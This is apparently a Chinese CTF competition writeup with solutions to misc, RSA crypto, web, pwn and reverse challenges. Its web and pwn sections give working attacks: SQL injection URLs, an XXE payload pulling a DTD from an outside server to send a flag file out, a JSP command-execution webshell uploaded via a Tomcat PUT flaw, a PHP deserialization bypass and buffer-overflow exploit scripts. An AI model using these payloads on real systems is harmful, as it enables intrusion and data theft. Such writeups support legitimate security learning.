河南金盾信安CTF | 风尘孤狼
0%

河南金盾信安CTF

image-20221218221949329

前言

img

第十八,省二,某些高校py太严重了,就这样!

解题WP

MISC-盗梦空间

Base解码,32->91->64->35->16得到逆序flag

}neMnAnaiTgniJieBevoLI{galf

倒序输出得到flag

flag{ILoveBeiJingTianAnMen}

MISC-qianda0_Sudoku

题目附件给了一张数独表,直接使用在线数独求解器

img

本来想着是直接解出来的字符就是flag,但是经过尝试后发现不对;

所以换了种思路,把空白的格子变为0,有数字的格子看为1,从左到右,从上到下

排列为一串01格式的编码,最终得到

011100110111010101100100001100000110101101110101010111110110011001110101010011100

直接二进制转字符得到flag

img

flag{sud0ku_fuN}

MISC-Megumi

题目提示是同人游戏社团,在线识图

img

img

得到这个社团名字是blessingsoftware

题目又提示guess是什么隐写,所以是outguess隐写

img

得到flag

flag{Megumi-Kato}

MISC-数据泄露01-账号泄露追踪

根据题目全网搜,最终在github里面找到了红香蕉

img

下载到本地找了一下,找到了key

img

所以flag为flag{GBUfty0vMqlrGOdE}

MISC-数据泄露02-泄露的密码

在网上查找了一些资料然后看到了一篇关于红香蕉APP接口异常问题的博客

https://www.cnblogs.com/tanyiqu66/p/16925174.html

然后看到了一个超级密码

img

猜想可能是flag,试了一下,发现是正确的

flag{redbanana2022sss}

Misc-数据泄露03-泄露的密钥

通过数据泄露02得到了一个知乎专栏的链接https://zhuanlan.zhihu.com/p/586641731

然后直接点进了这个作者的专栏,看到了另外一篇红香蕉App文件上传接口分析的博客

https://zhuanlan.zhihu.com/p/588516424

img

然后在这里找到了key

img

所以flag{51d0a99c-752e-11ed-b5a7-44af28a75237}

CRYPTO-小菜一碟

基础rsa,给了pqec,可以得出n,然后一把梭就行了

脚本如下

#!/usr/bin/env python3

\# coding:utf-8

\#power by jedi

 

import gmpy2

import binascii

 

p = gmpy2.mpz(159303842369547814925693476555868814571858842104258697105149515713993443203825659998652654127374510196025599003730143012113707484839253123496857732128701609968752699400092431858926716649428960535283324598902169712222454699617671683675932795780343545970625533166831907970102480122242685830820463772025494712199)

q = gmpy2.mpz(172887845783422002789082420254687566789308973977854220003084208506942637236520298084569310184947609392615644191634749946917611949170216103380692838274627779684269566710195695515000492922000964163572308396664983937642827715821977706257150587395323556335081542987902463903436949141288429937432819003811354533477)

e = gmpy2.mpz(19999)

n=p*q

phi_n = (p-1)*(q-1)

d = gmpy2.invert(e, phi_n)

c = gmpy2.mpz(15176702963665501922403999221895690215282504333559191936777611319802899006788248557279808041449600021838150559750953924442905812928090845724972302802437464578850548068341807388913597120410841772162320682183999897958037105171055839318049584110106368746019307718322196559113348222485399508199250407930454163630320204931310511881428526650112302088935473691025195368688328619506405195638348814876023324965555774105055157166629768444387302211760448217666053342945412276047036106026882600555168611384975424201854134312678053294600373283558738680924405596407956073538019064806588050349192904553467435863806385634189342027395)

 

m = pow(c, d, n)

m_hex = hex(m)[2:]

\#print("ascII:\n%s"%((binascii.b2a_hex(hex(m)[2:])).decode('hex'),))

print("ascii:\n%s"%(binascii.a2b_hex(m_hex).decode("utf8"),))

img

flag{TheFIFAWorldCupQatar2022}

CRYPTO-RRSSAA

又是rsa,共模攻击,脚本是网上找的

(´∇`) 欢迎回来! (cnblogs.com)

img

from libnum import n2s,s2n

from gmpy2 import invert

def egcd(a, b):

  if a == 0:

​    return (b, 0, 1)

  else:

​    g, y, x = egcd(b % a, a)

​    return (g, x - (b // a) * y, y)

 

def main():

  n =12009661749779034756396727735001476479240870865612015038829842902205933793482513947921473324596564360131381673272825627696670005006285512041897441088239864451061162580115681756159571684781053725291373792017708632104655354403858293040327819320525429826177782333368310575073194375936758240831635861902408234679184500210692222813769320679057069396141388699016874655236207995781942641952371703576990739368162064440778948037373761297210161428999949853983436108775543233507952174980558532153931260464690490095906157066427134117380483884033302788872138900564134415075637986008567266705178621552020850567292497574288675960823

  e1= 2333

  c1= 3091063916228464455521357922299851945733179824012337598325935431151534388234889582934719097957211574031506425780821664489121712504278835046257494105641946435467664631146730786295351188439182841680768531937382787335943965667714937822280848763425350089235645289384375623655179569897238696408868150422651859781815376696756981788347283996647604511187607188051598692339333337644956875630361418916795600637518633591481197783209020148212167599700531242494401774503456200889355439781332887736926823527200546226966803759767490748143939212274369822333951327997518975975960530675198444178464821237247544413301735105551687502988

  e2= 23333

  c2= 3020828772115226887000015133333821282592051548686903232559679837758040530392014545308146746971372113818852623844807332306519066119345705458457237902473211958279079988876840270162881686132679217898982958235064386584289972304614458185165683014776410738885399792032602501638437880558924737680288329872135075375340246371405482850885777367009879733890398886462506917356919767329145462495699851367240387357485822078838863882442289942481376842591016730244281710044592948116573144325447524357995553176271890557769659239135878101020400056503293673886968120697821156927485992635172356908737486318910095798432613528160497925715

  s = egcd(e1, e2)

  s1 = s[1]

  s2 = s[2]

  if s1<0:

​    s1 = - s1

​    c1 = invert(c1, n)

  elif s2<0:

​    s2 = - s2

​    c2 = invert(c2, n)

 

  m = pow(c1,s1,n)*pow(c2,s2,n) % n

  print (hex(m))

 

if __name__ == '__main__':

  main()

得到十进制flag,然后转hex之后再转字符串得到flag

img

img

flag{m-co-pr1m3}

CRYPTO-simpleR

又又又是个rsa,只给了c,e

用低加密指数分解攻击,爆破得到flag

脚本如下

import gmpy2

import libnum

 

c=3136716033731914452763044128945241240021620048803150767745968848345189851269112855865110275244336447973330360214689062351028386721896599362080560109450218446175674155425523734453425305156053870568600329

 

m = gmpy2.isqrt(c)

m = int(m)

m_text = libnum.n2s(m)  

print(m_text)

img

flag{efd90a18-7601-11ed-ac93-44af28a75237}

CRYPTO-rand

根据已给时间

img

求此时间的时间戳

然后再异或给的结果

脚本如下:

import random
 import time
 times = time.mktime(time.strptime("2022-12-10 10:30:50","%Y-%m-%d %H:%M:%S"))
 random.seed(times)
 rand = random.randint(0,10**30)
 flag = 881235169941718345882433419366^rand
 print(flag)

img

flag{659480394773869512498389750739}

WEB-EzPHP

首先dirsearch扫目录得到泄露文件

img

分析源码,可以写文件,但是需要注意strpos函数过滤了下划线,f_name在传参时下划线用点来代替从而绕过过滤

还有就是对于文件内容也进行了一定的限制,过滤了一些函数,同时限制了长度,在网上找了一个相对来说短的马

payload构造如下

img

上传成功,想要webshell还需要再利用这个写入post马

img

然后蚁剑连接找flag

img

flag{83ccbab8-5dcd-4eb2-b7ed-810148cd2128}

WEB-eZphp2

上一题的进阶,需要把木马写的更短,还是扫一下

img

访问index.php源码发现提示

img

继续访问得到源码

img

跟上一题差不多,就是在长度这里又缩短了

构造payload如下

img

上传成功,但是system函数或者echo等都无法使用,在这里使用 先dir一下看看flag在哪

img

file_get_contents函数进行绕过来读flag

img

flag{32b9c4c9-9aca-437f-a417-ccdbb096e0f7}

WEB-SQL

Id可以进行查询表内内容

img

只有俩内容

img

分析源码有一次urldecode,所以考虑闭合时应该使用二次编码引号,使用联合注入

Payload如下

测试注入列数

img

注入列数为3

查询数据库

http://59.110.213.14:41373/?id=1%2527union+select+1,2,group_concat(schema_name)+from+information_schema.schemata+%23

img

查询名为sqlll的表名

http://59.110.213.14:41373/?id=1%2527union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=%2527sqlll%2527+%23

img

查询列名is_this_flag

http://59.110.213.14:41373/?id=1%2527union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_name=%2527is_this_flag%2527%23

img

查询flag

http://59.110.213.14:41373/?id=1%2527union+select+1,2,group_concat(flag)+from+sqlll.is_this_flag%23

img

得到flag

flag{e4cf1b90-75d1-11ed-9b3b-44af28a75237}

WEB-有来无回

访问题目所给文件位置

img

题目上说了是xxe,所以在服务器上写个dtd恶意文件,直接传上去这个文件的同时监听服务器对应4000端口

img

构造payload

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE any[

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/flag.txt">

<!ENTITY % h SYSTEM "http://43.143.195.203:8080/dtd/1.dtd">

%h;

%dtd;

]>

<user>&xxe;</user>

img

img

Base64解码得到flag

img

flag{tqxh8rvijg4jibuxuzfaarvq8esu24uz}

WEB-图书馆

使用xray进行漏扫得到cve漏洞

img

访问/docs路径得到tomcat版本

img

找到相关复现文章

Tomcat任意文件写入(CVE-2017-12615)漏洞复现-含POC和EXP - 纸机 - 博客园 (cnblogs.com)

PUT直接上传jsp马

img

<% if(“112”.equals(request.getParameter(“pwd”))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(“i”)).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(“

”); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(“
”); } %>

密码112,Webshell得到flag

img

flag{c97d5af3-5691-43e2-b6a0-ed1dff4f6457}

WEB-反败为胜

进入界面后,发现是一段加密文本,然后通过F12看到了提示,发现是rc4加密,而且密码是0626,所以直接使用rc4在线解密

img

得到代码如下

<?php

echo("ser.php: You find me!");

class ouo{

  private $ser_code = "ser";

  function __destruct(){

​    if(!empty($this->ser_code)) {

​      if($this->ser_code == "FLAG")

​        echo ("{flag}");

​      else

​        die('Try Again!');

​    }}

  function __wakeup(){

​    $this->ser_code=null;

  }

}

$ser_code = $_COOKIE['SER'];

unserialize($ser_code);

?>

仔细审计代码发现本题反序列化的点在cookie的SER中,所以对SER做了一个反序列化的操作,payload如下

<?php
class ouo{
    private $ser_code = "FLAG";
    function __destruct(){
        if(!empty($this->ser_code)) {
            if($this->ser_code == "FLAG")
                echo ("{flag}");
            else
                die('Try Again!');
        }}
    function __wakeup(){
        $this->ser_code=null;
    }
}
$h=new ouo();
echo serialize($h);
//O:3:"ouo":1:{s:13:" ouo ser_code";s:4:"FLAG";}

需要绕过wakkup函数,于是得到 O:3:“ouo”:2:{s:13:“ouoser_code”;s:4:“FLAG”;},但是这里是需要进行url编码的,只有这样cookie那一栏才能识别

所以访问ser.php,并对Cookie传参,得到flag

img

flag{30815ff8-76c2-11ed-aec4-44af28a75237}

WEB-skip

这个题目看见页面我就感觉熟悉,之前国外一比赛的原题

[CTF] 2022 SECCON CTF Writeup skipinx(web) (velog.io)

curl $(python -c ‘print("http://59.110.213.14:54595/?“+“proxy=”+“q”*1000+”&a=b"*998+“&c=d”)’)

img

得到flag

flag{abe2ff50ebbc889f8b341fa53fd792e3}

PWN-login

找到原题:

https://blog.csdn.net/smalosnail/article/details/53694418

大概意思就是:

system地址放在ebp-4,input地址放在放在ebp+0的话,第一步时input地址将会被赋值给esp,ebp指向main函数的栈帧头;执行第二步时,因为esp这个时候指向input了,esp-=4,并赋值给eip,这样eip就获得了input+4中的内容——system地址

但是有个base64

print "ABCD\x84\x92\x04\x08\x40\xeb\x11\x08".encode('base64')

QUJDRISSBAhA6xEI

输入QUJDRISSBAhA6xEI就能getshell

img

flag{wel30me_t0_l0g1n}

PWN-Wtf

给了一个py文件和elf文件

nc靶机之后发现其运行的是py文件然后再打开的elf文件

分析elf文件

img

输一个v5然后进入fgets函数

img

每次读入一位,直到v5–!=0,那如果输入-1,就可以无限输入,每次读入都会赋给v4

V4距离rbp0x30,以此劫持程序走向win函数

img

再根据python文件的流程,脚本如下:

from pwn import *

context(os = "linux", arch = "amd64")

context.log_level = 'debug'

p=remote("59.110.213.14",56342)

win=0x4005f4

payload= '-1' +'\n'*4094+'a'*56+p64(win)+'\n'  #填满输入缓冲区,使其读入payload

p.recvuntil('payload please : ')

p.sendline(payload.encode('hex'))

p.interactive()

img

flag{3aed0a1e-7698-11ed-b8bd-44af28a75237}

Reverse-Tea

64位无壳丢到ida里面分析

img

img

这个应该就是xxtea算法

不太熟悉xxtea算法,搜到这个https://www.jianshu.com/p/4272e0805da3

根据文章里的脚本,小改一下

脚本如下:

#include <stdio.h>

\#include <stdint.h>

\#define DELTA 0x9e3779b9

\#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))

 

void btea(uint32_t* v, int n, uint32_t const key[4])

{

  uint32_t y, z, sum;

  unsigned p, rounds, e;

  if (n > 1)      /* Coding Part */

  {

​    rounds = 6 + 52 / n;

​    sum = 0;

​    z = v[n - 1];

​    do

​    {

​      sum += DELTA;

​      e = (sum >> 2) & 3;

​      for (p = 0; p < n - 1; p++)

​      {

​        y = v[p + 1];

​        z = v[p] += MX;

​      }

​      y = v[0];

​      z = v[n - 1] += MX;

​    } while (--rounds);

  }

  else if (n < -1)   /* Decoding Part */

  {

​    n = -n;

​    rounds = 6 + 52 / n;

​    sum = rounds * DELTA;

​    y = v[0];

​    do

​    {

​      e = (sum >> 2) & 3;

​      for (p = n - 1; p > 0; p--)

​      {

​        z = v[p - 1];

​        y = v[p] -= MX;

​      }

​      z = v[n - 1];

​      y = v[0] -= MX;

​      sum -= DELTA;

​    } while (--rounds);

  }

}

 

int main()

{

  uint32_t v[9] = { 0x6456DD95,0x2A41FD67,0x0AFE574A5,0x4BFA8D72,0x0E2BF316F,0x166B34BD,0x6232283A,

 0x4A1A8794,0x0D591779B };

  uint32_t v8[4];

  v8[0] = 0x5571CB4E;

  v8[1] = 0xC38A9D2F;

  v8[2] = 0x1D835B62;

  v8[3] = 0x93C3DC19;

  int n = 9;

  btea(v, -n, v8);

  for (int i = 0; i < 9; i++) {

​    int a = v[i];

​    for (int j = 0; j < 4; j++) {

 

​      int t = a ;

​      printf("%c", t);

​      a = a >> 8;

​    }

  }

 

}

img

flag{3430DF69-C220-40F9-9667-2B8C4A2FE6E9}

制作不易,如若感觉写的不错,欢迎打赏